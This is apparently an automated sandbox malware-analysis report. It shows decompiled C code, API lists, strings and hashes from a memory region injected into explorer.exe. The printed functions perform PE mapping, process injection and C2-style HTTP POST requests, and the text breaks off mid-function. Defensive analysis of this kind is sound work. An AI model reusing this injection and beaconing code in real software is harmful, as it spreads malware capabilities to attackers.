Part of subcall function 000CD523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 000CD547
Part of subcall function 000CD523: CoCreateInstance.OLE32(000DB848,00000000,00000001,000DB858,?), ref: 000CD55E
Part of subcall function 000CD523: SysAllocString.OLEAUT32(00000000), ref: 000CD569
Part of subcall function 000CD523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 000CD594

Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612

SysAllocString.OLEAUT32(00000000), ref: 000CDBE5
SysAllocString.OLEAUT32(00000000), ref: 000CDBF9
SysFreeString.OLEAUT32(?), ref: 000CDF82
SysFreeString.OLEAUT32(?), ref: 000CDF8B

Part of subcall function 000C861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000C8660

Strings

FALSE, xrefs: 000CDDAE
TRUE, xrefs: 000CDDA7

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
String ID: FALSE$TRUE
API String ID: 1290676130-1412513891
Opcode ID: 8f64d99d8bddc0f8d05caa57733e82f9ebc56da19da8ac571dec7ef87d777a96
Instruction ID: 6d3b30d497bcb0c8dfd19b86225b387c7b8e5a58e6196622d1d0c5e8feda6800
Opcode Fuzzy Hash: 8f64d99d8bddc0f8d05caa57733e82f9ebc56da19da8ac571dec7ef87d777a96
Instruction Fuzzy Hash: DCE14F71D00219AFDB54EFA4C989FEEBBB9FF48300F10816EE505AB291DB75A905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 000CC6C0, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 200
registryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E000CC6C0(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				struct HINSTANCE__* _v40;
				char _v44;
				char _v56;
				char _v72;
				struct _WNDCLASSEXA _v120;
				intOrPtr _t69;
				intOrPtr _t71;
				intOrPtr _t75;
				intOrPtr _t80;
				intOrPtr _t92;
				intOrPtr _t95;
				intOrPtr _t96;
				struct HWND__* _t106;
				intOrPtr* _t113;
				struct HINSTANCE__* _t116;
				intOrPtr _t120;
				intOrPtr _t126;
				intOrPtr _t131;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr _t139;
				char _t140;
				intOrPtr _t141;

				_t69 =  *0xde688; // 0xf0000
				_t126 = __ecx;
				_t134 = __edx;
				_t116 = 0;
				_v36 = __edx;
				_v16 = 0;
				_v44 = 0;
				_v40 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = __ecx;
				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
					E000CE23E(0x1f4);
					_t116 = 0;
				}
				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_v28 = _t116;
				if( *_t113 != 0x4550) {
					L12:
					if(_v8 != 0) {
						_t75 =  *0xde780; // 0x0
						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
						_v8 = _v8 & 0x00000000;
					}
					L14:
					if(_v12 != 0) {
						_t136 =  *0xde780; // 0x0
						 *((intOrPtr*)(_t136 + 0x10))(GetCurrentProcess(), _v12);
					}
					if(_v16 != 0) {
						_t71 =  *0xde780; // 0x0
						 *((intOrPtr*)(_t71 + 0x20))(_v16);
					}
					return _v8;
				}
				_push(_t116);
				_push(0x8000000);
				_v44 =  *((intOrPtr*)(_t113 + 0x50));
				_push(0x40);
				_push( &_v44);
				_push(_t116);
				_push(0xe);
				_push( &_v16);
				_t80 =  *0xde780; // 0x0
				if( *((intOrPtr*)(_t80 + 0xc))() < 0) {
					goto L12;
				}
				_v120.style = 0xb;
				_v120.cbSize = 0x30;
				_v120.lpszClassName =  &_v56;
				asm("movsd");
				_v120.lpfnWndProc = DefWindowProcA;
				asm("movsd");
				asm("movsd");
				asm("movsb");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_v120.cbWndExtra = 0;
				_v120.lpszMenuName = 0;
				_v120.cbClsExtra = 0;
				_v120.hInstance = 0;
				if(RegisterClassExA( &_v120) != 0) {
					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
					if(_t106 != 0) {
						DestroyWindow(_t106);
						UnregisterClassA( &_v56, 0);
					}
				}
				_t139 =  *0xde780; // 0x0
				_push(0x40);
				_push(0);
				_push(2);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v12);
				_push(GetCurrentProcess());
				_push(_v16);
				if( *((intOrPtr*)(_t139 + 0x14))() < 0) {
					_t126 = _v20;
					goto L12;
				} else {
					_push(0x40);
					_push(0);
					_push(2);
					_push( &_v24);
					_push(0);
					_push(0);
					_push(0);
					_t126 = _v20;
					_push( &_v8);
					_t92 =  *0xde780; // 0x0
					_push(_t126);
					_push(_v16);
					if( *((intOrPtr*)(_t92 + 0x14))() < 0) {
						goto L12;
					}
					_t140 = E000C8669( *0xde688, 0x1ac4);
					_v32 = _t140;
					if(_t140 == 0) {
						goto L12;
					}
					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
					_t95 =  *0xde684; // 0x14cf8f0
					_t96 =  *((intOrPtr*)(_t95 + 0x54))(_t126, 0, 0x1ac4, 0x1000, 4);
					_t120 =  *0xde684; // 0x14cf8f0
					_t131 = _t96;
					 *((intOrPtr*)(_t120 + 0x20))(_v20, _t131, _t140, 0x1ac4,  &_v28);
					E000C861A( &_v32, 0x1ac4);
					_t141 =  *0xde688; // 0xf0000
					 *0xde688 = _t131;
					E000C86E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
					E000CC63F(_v12, _v8, _v36);
					 *0xde688 = _t141;
					goto L14;
				}
			}

0x000cc6c6
0x000cc6cd
0x000cc6cf
0x000cc6d1
0x000cc6d3
0x000cc6d6
0x000cc6d9
0x000cc6dc
0x000cc6df
0x000cc6e2
0x000cc6e5
0x000cc6ef
0x000cc6f2
0x000cc6f9
0x000cc6fe
0x000cc6fe
0x000cc704
0x000cc706
0x000cc70f
0x000cc8b5
0x000cc8b9
0x000cc8be
0x000cc8c4
0x000cc8c7
0x000cc8c7
0x000cc8cb
0x000cc8d0
0x000cc8d5
0x000cc8e2
0x000cc8e2
0x000cc8eb
0x000cc8ed
0x000cc8f5
0x000cc8f5
0x000cc8fc
0x000cc8fc
0x000cc718
0x000cc719
0x000cc71e
0x000cc724
0x000cc726
0x000cc727
0x000cc728
0x000cc72d
0x000cc72e
0x000cc738
0x00000000
0x00000000
0x000cc743
0x000cc74d
0x000cc757
0x000cc75a
0x000cc760
0x000cc767
0x000cc768
0x000cc769
0x000cc772
0x000cc773
0x000cc774
0x000cc776
0x000cc779
0x000cc77c
0x000cc77f
0x000cc782
0x000cc78e
0x000cc7b0
0x000cc7b8
0x000cc7bb
0x000cc7c6
0x000cc7c6
0x000cc7b8
0x000cc7cc
0x000cc7d5
0x000cc7d7
0x000cc7d8
0x000cc7da
0x000cc7db
0x000cc7dc
0x000cc7dd
0x000cc7e1
0x000cc7e8
0x000cc7e9
0x000cc7f1
0x000cc8b2
0x00000000
0x000cc7f7
0x000cc7f7
0x000cc7f9
0x000cc7fa
0x000cc7ff
0x000cc800
0x000cc801
0x000cc802
0x000cc803
0x000cc809
0x000cc80a
0x000cc80f
0x000cc810
0x000cc818
0x00000000
0x00000000
0x000cc82e
0x000cc830
0x000cc837
0x00000000
0x00000000
0x000cc848
0x000cc84e
0x000cc856
0x000cc859
0x000cc85f
0x000cc86f
0x000cc87b
0x000cc880
0x000cc886
0x000cc896
0x000cc8a2
0x000cc8aa
0x00000000
0x000cc8aa

APIs

RegisterClassExA.USER32 ref: 000CC785
CreateWindowExA.USER32 ref: 000CC7B0
DestroyWindow.USER32 ref: 000CC7BB
UnregisterClassA.USER32(?,00000000), ref: 000CC7C6
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 000CC7E2
GetCurrentProcess.KERNEL32(00000000), ref: 000CC8DB

Part of subcall function 000C861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000C8660

Strings

sadccdcdsasa, xrefs: 000CC73E
cdcdwqwqwq, xrefs: 000CC76A
0, xrefs: 000CC74D

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: ClassCurrentProcessWindow$CreateDestroyFreeHeapRegisterUnregister
String ID: 0$cdcdwqwqwq$sadccdcdsasa
API String ID: 3082384575-2319545179
Opcode ID: 30f02b7e46c7d71ff10a185c5fbaa52410663a017795f1e9a48535fd24a3d570
Instruction ID: 90c4ed74458554630278fabfd861411d24eeea79e783751d3e5e158c8fbe04a2
Opcode Fuzzy Hash: 30f02b7e46c7d71ff10a185c5fbaa52410663a017795f1e9a48535fd24a3d570
Instruction Fuzzy Hash: EF711971901249AFEB11DF95DC48FAFBBB9EF49700F14406AF905AB290D774AA04CB64

Uniqueness

Uniqueness Score: -1.00%

Function 000C5F82, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 78%

			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
				char _v8;
				char _v16;
				short _v144;
				short _v664;
				void* _t19;
				struct HINSTANCE__* _t22;
				long _t23;
				long _t24;
				char* _t27;
				WCHAR* _t32;
				long _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t49;
				int _t53;
				void* _t54;
				intOrPtr* _t55;
				void* _t57;

				_t49 = __edx;
				OutputDebugStringA("Hello qqq");
				if(_a8 != 1) {
					if(_a8 != 0) {
						L12:
						return 1;
					}
					SetLastError(0xaa);
					L10:
					return 0;
				}
				E000C85EF();
				_t19 = E000C980C( &_v16);
				_t57 = _t49;
				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
					goto L12;
				} else {
					E000C8F78();
					GetModuleHandleA(0);
					_t22 = _a4;
					 *0xde69c = _t22;
					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
					_t24 = GetLastError();
					if(_t23 != 0 && _t24 != 0x7a) {
						memset( &_v144, 0, 0x80);
						_t55 = _t54 + 0xc;
						_t53 = 0;
						do {
							_t27 = E000C95C7(_t53);
							_a8 = _t27;
							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
							E000C85C2( &_a8);
							_t53 = _t53 + 1;
						} while (_t53 < 0x2710);
						E000D2A5B( *0xde69c);
						 *_t55 = 0x7c3;
						 *0xde684 = E000CE1BC(0xdba28, 0x11c);
						 *_t55 = 0xb4e;
						_t32 = E000C95E1(0xdba28);
						_a8 = _t32;
						_t33 = GetFileAttributesW(_t32);
						_push( &_a8);
						if(_t33 == 0xffffffff) {
							E000C85D5();
							_v8 = 0;
							_t37 =  *0xde684; // 0x14cf8f0
							_t38 =  *((intOrPtr*)(_t37 + 0x70))(0, 0, E000C5E06, 0, 0,  &_v8);
							 *0xde6a8 = _t38;
							if(_t38 == 0) {
								goto L10;
							}
							goto L12;
						}
						E000C85D5();
					}
					goto L10;
				}
			}

0x000c5f82
0x000c5f92
0x000c5f9c
0x000c60d0
0x000c60c3
0x00000000
0x000c60c5
0x000c60d7
0x000c6098
0x00000000
0x000c6098
0x000c5fa2
0x000c5faa
0x000c5fb1
0x000c5fb3
0x00000000
0x000c5fc6
0x000c5fc6
0x000c5fcc
0x000c5fd2
0x000c5fe2
0x000c5fe7
0x000c5fef
0x000c5ff7
0x000c6013
0x000c6018
0x000c601b
0x000c601d
0x000c601f
0x000c602c
0x000c6035
0x000c603e
0x000c6043
0x000c6044
0x000c6052
0x000c605c
0x000c606d
0x000c6072
0x000c6079
0x000c6080
0x000c6083
0x000c608f
0x000c6090
0x000c609c
0x000c60a5
0x000c60a9
0x000c60b7
0x000c60ba
0x000c60c1
0x00000000
0x00000000
0x00000000
0x000c60c1
0x000c6092
0x000c6097
0x00000000
0x000c5ff7

APIs

OutputDebugStringA.KERNEL32(Hello qqq), ref: 000C5F92
SetLastError.KERNEL32(000000AA), ref: 000C60D7

Part of subcall function 000C85EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,000C5FA7), ref: 000C85F8

Part of subcall function 000C980C: GetSystemTimeAsFileTime.KERNEL32(?,?,000C5FAF), ref: 000C9819

GetModuleHandleA.KERNEL32(00000000), ref: 000C5FCC
GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 000C5FE7
GetLastError.KERNEL32 ref: 000C5FEF
memset.MSVCRT ref: 000C6013
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 000C6035
GetFileAttributesW.KERNEL32(00000000), ref: 000C6083

Strings

Hello qqq, xrefs: 000C5F8D

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: File$ErrorLastModuleTime$AttributesByteCharCreateDebugHandleHeapMultiNameOutputStringSystemWidememset
String ID: Hello qqq
API String ID: 3872149766-3610097158
Opcode ID: afce7757140dcc93f3ebf7c21342cb0b72ab48de7d80f37f0806af0865a9f0e7
Instruction ID: 2d4d97f5f62f02f8306ca91f288e7d0caa95757fa3380263e34e887ee25bd247
Opcode Fuzzy Hash: afce7757140dcc93f3ebf7c21342cb0b72ab48de7d80f37f0806af0865a9f0e7
Instruction Fuzzy Hash: 6831A670900604ABEB64BB34DC49FAF3BB8EB55710F20852EF915D6192DF789A49CB31

Uniqueness

Uniqueness Score: -1.00%

Function 000CE668, Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 305
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E000CE668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				int _v76;
				void* _v80;
				intOrPtr _v100;
				int _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				void _v124;
				char _v140;
				void _v396;
				void _v652;
				intOrPtr _t105;
				intOrPtr _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t131;
				char _t133;
				intOrPtr _t136;
				char _t138;
				char _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				intOrPtr _t154;
				intOrPtr _t158;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr _t166;
				intOrPtr _t172;
				intOrPtr _t176;
				void* _t183;
				void* _t185;
				intOrPtr _t186;
				char _t195;
				intOrPtr _t203;
				intOrPtr _t204;
				signed int _t209;
				void _t212;
				intOrPtr _t213;
				void* _t214;
				intOrPtr _t216;
				char _t217;
				intOrPtr _t218;
				signed int _t219;
				signed int _t220;
				void* _t221;

				_v40 = _v40 & 0x00000000;
				_v24 = 4;
				_v36 = 1;
				_t214 = __edx;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_v64 = E000C95C7(0x85b);
				_v60 = E000C95C7(0xdc9);
				_v56 = E000C95C7(0x65d);
				_v52 = E000C95C7(0xdd3);
				_t105 = E000C95C7(0xb74);
				_v44 = _v44 & 0;
				_t212 = 0x3c;
				_v48 = _t105;
				memset( &_v124, 0, 0x100);
				_v116 = 0x10;
				_v120 =  &_v140;
				_v124 = _t212;
				_v108 =  &_v396;
				_v104 = 0x100;
				_v80 =  &_v652;
				_push( &_v124);
				_push(0);
				_v76 = 0x100;
				_push(E000CC379(_t214));
				_t113 =  *0xde6a4; // 0x14cfe60
				_push(_t214);
				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
					_t209 = 0;
					_v20 = 0;
					do {
						_t115 =  *0xde6a4; // 0x14cfe60
						_v12 = 0x8404f700;
						_t213 =  *_t115( *0xde788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
						if(_t213 != 0) {
							_t195 = 3;
							_t185 = 4;
							_v8 = _t195;
							_t118 =  *0xde6a4; // 0x14cfe60
							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
							_v8 = 0x3a98;
							_t121 =  *0xde6a4; // 0x14cfe60
							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
							_v8 = 0x493e0;
							_t124 =  *0xde6a4; // 0x14cfe60
							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
							_v8 = 0x493e0;
							_t127 =  *0xde6a4; // 0x14cfe60
							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
							_t131 =  *0xde6a4; // 0x14cfe60
							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
							if(_a24 != 0) {
								E000C980C(_a24);
							}
							if(_t186 != 0) {
								_t133 = 0x8484f700;
								if(_v112 != 4) {
									_t133 = _v12;
								}
								_t136 =  *0xde6a4; // 0x14cfe60
								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
								_v8 = _t216;
								if(_a24 != 0) {
									E000C980C(_a24);
								}
								if(_t216 != 0) {
									_t138 = 4;
									if(_v112 != _t138) {
										L19:
										_t139 = E000C95C7(0x777);
										_t217 = _t139;
										_v12 = _t217;
										_t141 =  *0xde6a4; // 0x14cfe60
										_t218 = _v8;
										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E000CC379(_t217), _a4, _a8);
										E000C85C2( &_v12);
										if(_a24 != 0) {
											E000C980C(_a24);
										}
										if(_v28 != 0) {
											L28:
											_v24 = 8;
											_push(0);
											_v32 = 0;
											_v28 = 0;
											_push( &_v24);
											_push( &_v32);
											_t147 =  *0xde6a4; // 0x14cfe60
											_push(0x13);
											_push(_t218);
											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
												_t219 = E000C9749( &_v32);
												if(_t219 == 0xc8) {
													 *_a20 = _v8;
													 *_a12 = _t213;
													 *_a16 = _t186;
													return 0;
												}
												_t220 =  ~_t219;
												L32:
												_t154 =  *0xde6a4; // 0x14cfe60
												 *((intOrPtr*)(_t154 + 8))(_v8);
												L33:
												if(_t186 != 0) {
													_t158 =  *0xde6a4; // 0x14cfe60
													 *((intOrPtr*)(_t158 + 8))(_t186);
												}
												if(_t213 != 0) {
													_t203 =  *0xde6a4; // 0x14cfe60
													 *((intOrPtr*)(_t203 + 8))(_t213);
												}
												return _t220;
											}
											GetLastError();
											_t220 = 0xfffffff8;
											goto L32;
										} else {
											GetLastError();
											_t162 =  *0xde6a4; // 0x14cfe60
											 *((intOrPtr*)(_t162 + 8))(_t218);
											_t218 = 0;
											goto L23;
										}
									}
									_v12 = _t138;
									_push( &_v12);
									_push( &_v16);
									_t172 =  *0xde6a4; // 0x14cfe60
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
										L18:
										GetLastError();
										goto L19;
									}
									_v16 = _v16 | 0x00003380;
									_push(4);
									_push( &_v16);
									_t176 =  *0xde6a4; // 0x14cfe60
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
										goto L19;
									}
									goto L18;
								} else {
									GetLastError();
									L23:
									_t164 =  *0xde6a4; // 0x14cfe60
									 *((intOrPtr*)(_t164 + 8))(_t186);
									_t186 = 0;
									goto L24;
								}
							} else {
								GetLastError();
								L24:
								_t166 =  *0xde6a4; // 0x14cfe60
								 *((intOrPtr*)(_t166 + 8))(_t213);
								_t213 = 0;
								goto L25;
							}
						}
						GetLastError();
						L25:
						_t204 = _t218;
						_t209 = _v20 + 1;
						_v20 = _t209;
					} while (_t209 < 2);
					_v8 = _t218;
					if(_t204 != 0) {
						goto L28;
					}
					_t220 = 0xfffffffe;
					goto L33;
				}
				_t183 = 0xfffffffc;
				return _t183;
			}

0x000ce671
0x000ce683
0x000ce68c
0x000ce696
0x000ce69a
0x000ce6ab
0x000ce6c2
0x000ce6cf
0x000ce6dc
0x000ce6e9
0x000ce6ec
0x000ce6f1
0x000ce6f6
0x000ce6f8
0x000ce700
0x000ce70b
0x000ce712
0x000ce71e
0x000ce721
0x000ce72f
0x000ce732
0x000ce738
0x000ce739
0x000ce73b
0x000ce744
0x000ce745
0x000ce74a
0x000ce750
0x000ce75a
0x000ce75c
0x000ce761
0x000ce761
0x000ce770
0x000ce77f
0x000ce783
0x000ce792
0x000ce795
0x000ce79a
0x000ce79e
0x000ce7a5
0x000ce7ac
0x000ce7b4
0x000ce7bc
0x000ce7c3
0x000ce7cb
0x000ce7d3
0x000ce7da
0x000ce7e2
0x000ce7ea
0x000ce7ff
0x000ce80c
0x000ce80e
0x000ce813
0x000ce813
0x000ce81a
0x000ce82b
0x000ce830
0x000ce832
0x000ce832
0x000ce846
0x000ce858
0x000ce85a
0x000ce85d
0x000ce862
0x000ce862
0x000ce869
0x000ce878
0x000ce87c
0x000ce8ba
0x000ce8bf
0x000ce8c7
0x000ce8cc
0x000ce8d7
0x000ce8dd
0x000ce8e7
0x000ce8ea
0x000ce8f3
0x000ce8f8
0x000ce8f8
0x000ce901
0x000ce94a
0x000ce94c
0x000ce953
0x000ce954
0x000ce957
0x000ce95d
0x000ce961
0x000ce962
0x000ce967
0x000ce969
0x000ce96f
0x000ce984
0x000ce98c
0x000ce9c1
0x000ce9c6
0x000ce9cb
0x00000000
0x000ce9cd
0x000ce98e
0x000ce990
0x000ce990
0x000ce999
0x000ce99c
0x000ce99e
0x000ce9a0
0x000ce9a6
0x000ce9a6
0x000ce9ab
0x000ce9ad
0x000ce9b4
0x000ce9b4
0x00000000
0x000ce9b7
0x000ce971
0x000ce979
0x00000000
0x000ce903
0x000ce903
0x000ce909
0x000ce90f
0x000ce912
0x00000000
0x000ce912
0x000ce901
0x000ce87e
0x000ce884
0x000ce888
0x000ce889
0x000ce88e
0x000ce890
0x000ce896
0x000ce8b4
0x000ce8b4
0x00000000
0x000ce8b4
0x000ce898
0x000ce8a2
0x000ce8a4
0x000ce8a5
0x000ce8aa
0x000ce8ac
0x000ce8b2
0x00000000
0x00000000
0x00000000
0x000ce86b
0x000ce86b
0x000ce914
0x000ce914
0x000ce91a
0x000ce91d
0x00000000
0x000ce91d
0x000ce81c
0x000ce81c
0x000ce91f
0x000ce91f
0x000ce925
0x000ce928
0x00000000
0x000ce928
0x000ce81a
0x000ce785
0x000ce92a
0x000ce92d
0x000ce92f
0x000ce932
0x000ce935
0x000ce93e
0x000ce943
0x00000000
0x00000000
0x000ce947
0x00000000
0x000ce947
0x000ce754
0x00000000

APIs

memset.MSVCRT ref: 000CE69A
memset.MSVCRT ref: 000CE6AB
memset.MSVCRT ref: 000CE700
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 000CE785

Strings

POST, xrefs: 000CE84B

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: memset$ErrorLast
String ID: POST
API String ID: 2570506013-1814004025
Opcode ID: dfd938f0bb15fde58defddc577967521ee4e7b500bdf816b0d1b8b88e8ab6379
Instruction ID: 4d43e44888571cf18f116a7444a457047133596d59fd9b6ecec0fcfd96a40a65
Opcode Fuzzy Hash: dfd938f0bb15fde58defddc577967521ee4e7b500bdf816b0d1b8b88e8ab6379
Instruction Fuzzy Hash: 5FB12C71901248AFEB55DFA4DC89FEE7BB8EF18310F10406AF505EB291DB749A44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 000D16B8, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E000D16B8(signed int* _a4) {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				char _v20;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				void* _t22;
				intOrPtr* _t28;
				signed int _t29;
				signed int _t30;
				struct HINSTANCE__* _t32;
				void* _t34;

				_t30 = 0;
				_v8 = 0;
				_t32 = GetModuleHandleA("advapi32.dll");
				if(_t32 == 0) {
					L9:
					return 1;
				}
				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
				_v12 = _t16;
				if(_t16 == 0) {
					goto L9;
				}
				_t17 = GetProcAddress(_t32, "CryptGenRandom");
				_v16 = _t17;
				if(_t17 == 0) {
					goto L9;
				}
				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
				if(_t28 == 0) {
					goto L9;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if(_v12() == 0) {
					goto L9;
				}
				_t22 = _v16(_v8, 4,  &_v20);
				 *_t28(_v8, 0);
				if(_t22 == 0) {
					goto L9;
				}
				_t29 = 0;
				do {
					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
					_t29 = _t29 + 1;
				} while (_t29 < 4);
				 *_a4 = _t30;
				return 0;
			}

0x000d16c1
0x000d16c8
0x000d16d1
0x000d16d5
0x000d1750
0x00000000
0x000d1752
0x000d16e3
0x000d16e5
0x000d16ea
0x00000000
0x00000000
0x000d16f2
0x000d16f4
0x000d16f9
0x00000000
0x00000000
0x000d1703
0x000d1707
0x00000000
0x00000000
0x000d1709
0x000d170e
0x000d1710
0x000d1711
0x000d1715
0x000d171b
0x00000000
0x00000000
0x000d1726
0x000d172f
0x000d1733
0x00000000
0x00000000
0x000d1735
0x000d1737
0x000d173f
0x000d1741
0x000d1742
0x000d174a
0x00000000

APIs

GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,000C765A,?,?,00000000,?), ref: 000D16CB
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 000D16E3
GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 000D16F2
GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 000D1701

Strings

CryptAcquireContextA, xrefs: 000D16DD
CryptReleaseContext, xrefs: 000D16FB
advapi32.dll, xrefs: 000D16C3
CryptGenRandom, xrefs: 000D16EC

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
API String ID: 667068680-129414566
Opcode ID: b65605c404d714bd0c7f6cdc014c82bbf85117c506fbb09874c6584b791f05d9
Instruction ID: d4b23a3b7ac53867078bef81616309f1c6fba6ca7a6e27690adaf6b111cb43cd
Opcode Fuzzy Hash: b65605c404d714bd0c7f6cdc014c82bbf85117c506fbb09874c6584b791f05d9
Instruction Fuzzy Hash: CF117332A05715BBEB615BEA8C84EEF7BF9AF45780B044066EA15F6350DE70D9008B74

Uniqueness

Uniqueness Score: -1.00%

Function 000D2122, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E000D2122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				int _t15;
				char* _t24;
				char* _t26;
				char* _t28;
				char* _t29;
				signed int _t40;
				char* _t43;
				char* _t45;
				long long* _t47;

				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t26 = _a4;
				_push(_t30);
				 *_t47 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t26);
				L000D2285();
				_t40 = _t12;
				if(_t40 < 0 || _t40 >= _a8) {
					L19:
					_t13 = _t12 | 0xffffffff;
					goto L20;
				} else {
					L000D22CD();
					_t15 =  *((intOrPtr*)( *_t12));
					if(_t15 != 0x2e) {
						_t24 = strchr(_t26, _t15);
						if(_t24 != 0) {
							 *_t24 = 0x2e;
						}
					}
					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
						L11:
						_t43 = strchr(_t26, 0x65);
						_t28 = _t43;
						if(_t43 == 0) {
							L18:
							_t13 = _t40;
							L20:
							return _t13;
						}
						_t45 = _t43 + 1;
						_t29 = _t28 + 2;
						if( *_t45 == 0x2d) {
							_t45 = _t29;
						}
						while( *_t29 == 0x30) {
							_t29 = _t29 + 1;
						}
						if(_t29 != _t45) {
							E000C8706(_t45, _t29, _t40 - _t29 + _a4);
							_t40 = _t40 + _t45 - _t29;
						}
						goto L18;
					} else {
